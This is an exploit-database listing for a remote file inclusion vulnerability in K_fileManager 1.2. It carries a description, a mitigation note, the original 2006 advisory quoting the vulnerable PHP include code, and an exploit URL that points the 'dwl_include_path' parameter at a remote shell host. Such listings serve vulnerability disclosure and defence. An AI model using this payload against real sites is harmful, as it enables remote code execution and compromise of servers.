header-logo
Suggest Exploit
vendor:
K_fileManager
by:
SHiKaA
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: K_fileManager
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:knusperleicht:k_filemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

K_fileManager v1.2 <= (dwl_include_path) Remote File Inclusion Exploit

K_fileManager v1.2 is vulnerable to a Remote File Inclusion vulnerability due to a lack of sanitization of user-supplied input in the 'dwl_include_path' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a malicious URL in the 'dwl_include_path' parameter, which will be included in the application. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in the application. Additionally, the application should be configured to only allow the inclusion of files from trusted sources.
Source

Exploit-DB raw data:

#=================================================================
#K_fileManager v1.2 <= (dwl_include_path) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://knusperleicht.at/                         |
#                                                                |
#Version : 1.2                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#/**********************************************************
#//  INCLUDE PATH
#@define("DWL_INCLUDE_PATH",$dwl_include_path);
#//  INCLUDE PATH
#//**********************************************************
#
#//Dateien importieren
#       require_once(DWL_INCLUDE_PATH."inc/config.inc.php");
#       require_once(DWL_INCLUDE_PATH."lang/".FM_LANGUAGE."/lang.inc.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_template.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_db.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_directory.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_stuff.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_statistic.php");
#
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?dwl_include_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================

# milw0rm.com [2006-08-01]